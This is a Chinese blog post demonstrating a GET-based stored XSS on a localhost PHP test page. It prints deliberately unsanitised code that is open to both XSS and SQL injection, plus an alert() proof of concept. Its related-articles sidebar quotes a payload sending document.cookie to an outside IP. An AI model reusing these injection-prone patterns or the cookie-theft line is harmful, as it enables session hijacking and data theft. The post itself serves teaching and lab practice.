基于get的xss注入

最新推荐文章于 2024-06-04 13:39:04 发布
最新推荐文章于 2024-06-04 13:39:04 发布
阅读量745 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a843538946/article/details/85054782
版权

abc.php


<?php
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "test";
 
// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);
// 检测连接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
 
$sql = "INSERT INTO yonghu (username, password)
VALUES ('John', '".$_GET['id']."')";
 
if ($conn->query($sql) === TRUE) {
    echo "ok";
} else {
    echo "Error: " . $sql . "<br>" . $conn->error;
}
 
$conn->close();
?>


浏览器访问 http://localhost/abc.php?id=234<script>alert("1231")</script>

但是如果输入http://localhost/abc.php?id=234<script>alert('1231')</script>会报错,拼接不出字符串

 

发现数据库插入成功

password的字段信息为2<script>alert("1231")</script>

然后显示该信息写个welcome.php

代码如下

<html>
<body>
<?php
$con = mysql_connect("localhost","root","root");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }
else
{
   mysql_select_db("test");

   $id = $_GET['id'];
$query ="select * from yonghu where Id=$id";
$result = mysql_query($query);
$info= mysql_fetch_array($result);    
$re_num = mysql_num_rows($result);
        if($info==FALSE)
        {
            echo "抱歉,您的订餐信息没有查到!";
        }
        else
        {
                echo "<form action='index.php' method='post' name='chakanform'>";
                echo "<table>";
                echo "<tr>";
                echo "<h3>你的订餐记录是:</h3>";
                echo "</tr>";
                echo "<tr>";
                echo "<td>";
                echo "序号:";
                echo "</td>";
                echo "<td>";
                echo "菜品:";
                echo "</td>";
                echo "<td>";
                echo "订餐时间";
                echo "</td>";
                echo "<td>";
                echo "订餐时间";
                echo "</td>";
                echo "<td>";
                echo "订餐时间";
                echo "</td>";
                echo "<td>";
                echo "订餐时间";
                echo "</td>";
                                echo "<td>";
                echo "订餐时间";
                echo "</td>";
                echo "<td>";
                echo "订餐时间";
                echo "</td>";                                
                echo "</tr>";
                do
                {
                    $xuhao++;    
                    echo "<tr>";
                    echo "<td>";
                    echo $xuhao;
                    echo "</td>";
                    echo "<td>";
                    echo $info[username];
                    echo "</td>";
                    echo "<td>";
                    echo $info[password];
                    echo "</td>";
                    echo "<td>";
                    echo $info[id];
                    echo "</td>";
                            echo "<td>";
                }
                while($info= @mysql_fetch_array($result));
                echo "</table>";
                echo "</form>";    
        }
mysql_close($con);
}

?>
</body>
</html>

 

结果访问提示alert,成功注入

原野追逐科技
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Flash XSS漏洞挖掘1
08-03
Flash应用程序基于ActionScript开发,与ECMAScript相似,因此开发者如果不谨慎处理输入和敏感函数,可能导致任意JavaScript代码执行,这类似于Web中的DOM XSS漏洞。而许多人可能首先联想到的是不安全的`getURL()`...
基于Python的XSS测试工具XSStrike使用方法
09-21
### 基于Python的XSS测试工具XSStrike使用方法详解 #### 跨站脚本攻击(XSS)概述 XSS(Cross Site Scripting,跨站脚本攻击)是一种常见的Web安全漏洞,主要发生在客户端。这种攻击手段允许攻击者通过注入恶意...
xss发送请求
3569
11-06 688
var img=document.createElement("img"); img.src="http://172.16.5.110:64321/?cao="+escape(document.cookie); document.body.appendChild(img);
闲庭信步聊前端 - 漫谈XSS
大转转FE
12-22 314
闲庭信步聊前端 - 漫谈XSS什么是XSS?众所周知XSS是Cross-Site Scripting(跨站脚本攻击)的简称,但是英文的缩写明明是CSS为什么叫XSS呢?———历史遗留问题...
XSS注入总结
最新发布
白帽黑客佳哥的博客
06-04 934
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。X-XSS-Protection,即XSS保护属性,是设置在响应头中目的是用来防范XSS攻击的。如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。将利用写在自己服务器上,核心是让受害者访问我们的服务器,然后触发别的网站的xss。所有能输入的地方都要试一次,有字数限制的可以在burp里改。里的时候,闭合标签会被当做代码执行。
springboot经验之sql注入xss注入拦截(POST)
lipeng的博客
02-08 3863
简介 sql注入xss注入、cors攻击的简介以及解决方案,可以参考下面链接: https://blog.csdn.net/yhhyhhyhhyhh/article/details/84504487 这里我就不做的的介绍了,解决sql注入根本方案在于使用预编译而不是拼接sql, 而通常拦截参数都只有针对GET方法,下面介绍下POST方法 POST防注入方案 1、增加httprequest包装类 ...
XSS攻击(3), 实战XSS注入思路
探测???
10-19 1107
上面代码在网页中嵌入一个Adobe Flash文件. 因为在2020年底之后, 主流的浏览器已经不支持Flash文件,前面value虽然闭合了, 但是后面无法执行事件. 那么可能一些类似的事件都被防御了.前面的input标签虽然闭合了, 但是后面的script标签被替换了, 无法执行js.因为F12是临时修改, 这里的控件在提交之后就会还原成隐藏的, 所以后面使用一个。这时前面的value被闭合, 后面多了一个事件, 单机文本框即可弹出.如果输入的符号没有被转义或替换, 说明前面可以闭合, 进一步测试.
XSS注入的原理与实现
LJH1999ZN的博客
02-17 4455
一、JavaScript的常用脚本 1.window.location.href 用来跳转页面 eg:<script>window.location.href='www.jd.com'</script> 2.document.cookie 获取客户端的cookie值 3.script 可以通过“src”属性引入JavaScript文件 二、什么是同源策略 同源策略在web应用的安全模型中是一个重要概念。在这个策略下,web浏览器允许第一个页面的脚本访问第...
自己动手编写SQL注入漏洞扫描工具
03-25
5. **漏洞确认**:基于响应的分析,判断是否存在SQL注入漏洞。例如,如果注入导致了额外数据的返回,或者请求执行时间明显增加,可能就存在注入点。 在提供的压缩包中,有两个程序可能实现了这些步骤的一部分或全部...
xss.me跨站平台源码 Sae版本
02-22
XSS(Cross-site scripting)是一种常见的网络攻击方式,它利用网站对用户输入的不安全处理,将恶意脚本注入到网页中,当其他用户访问这些被注入脚本的页面时,恶意脚本会被执行,从而导致用户的敏感信息泄露或执行...
php 使用post,get的一种简洁方式
10-29
在PHP编程中,HTTP请求中的数据通常通过`POST`和`GET`方法传递,而开发者通常使用`$_POST`和`$_GET`全局数组来获取...同时,应遵循最佳实践,例如使用预处理语句防止SQL注入,以及使用htmlspecialchars来防御XSS攻击。
get方式的xss漏洞利用
qq_43814486的博客
04-15 2641
原理:后端没有对信息的输入和输出进行处理。提交信息(精心构造的payload)后,页面实质是把信息通过URL传到后台,也就是说,每一次通过浏览器进行这个URL访问的时候都会执行我们刚刚提交的信息(精心构造的payload)大致过程如图: 插一个小知识:通过前端对输入框进行限制其实是没用的,可以通过查看前端的代码找到对应的代码进行修改,如图: ...
pikachu靶场第五关——XSS(跨站脚本)之反射型xss(get)(附代码审计)
yzasts的博客
03-18 1440
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
XSS
qq_25956141的博客
01-21 1185
1.常见XSS漏洞1--get请求回显漏洞  当我们的网页使用的是get请求的时候,服务器后端将get请求的字符串编码(在浏览器上使用的是encode编码)回显到页面的时候, 如果我们输入的是正常的一段字符,那么,他显示的是一段字符,然而,如果我们输入的是一段html代码呢???那么回显的就是一段html代码,当你的页面允许这样的时候,那么就要注意了,别人可以在你的链接上面加很长一段自己的
Web安全-XSS
weixin_34212189的博客
11-27 103
XSS的定义 攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和JavaScript脚本)注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取cookie窃取、会话劫持、钓鱼欺骗。 XSS的攻击方式 反射型 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器解析后响应,XSS代码随响应内容一起传回浏览器,最后浏览器解析执行XSS代码。这个过程...
XSS注入
热门推荐
weixin_47785246的博客
02-18 1万+
本篇文章详细讲解XSS漏洞及其原理,以及常见的XSS漏洞利用和一些防范手段。同时最后会通过对特定靶场环境进行手工的XSS漏洞的注入,以便加深对XSS漏洞的熟悉与理解。
[ pikachu ] 靶场通关之 XSS (二) --- 反射型 XSS 之 get 型
qq_51577576的博客
01-14 2514
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、反射型xss(get) 二、过关: 1. 页面 2. 首先确认一下这个页
java请求URL带参之防XSS攻击
weixin_30768661的博客
12-26 709
1.web.xml新增filter配置 <!-- URL请求参数字符过滤或合法性校验 --> <filter> <filter-name>XssFilter</filter-name> <filter-class>com.isoftstone.ifa.web.bas...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值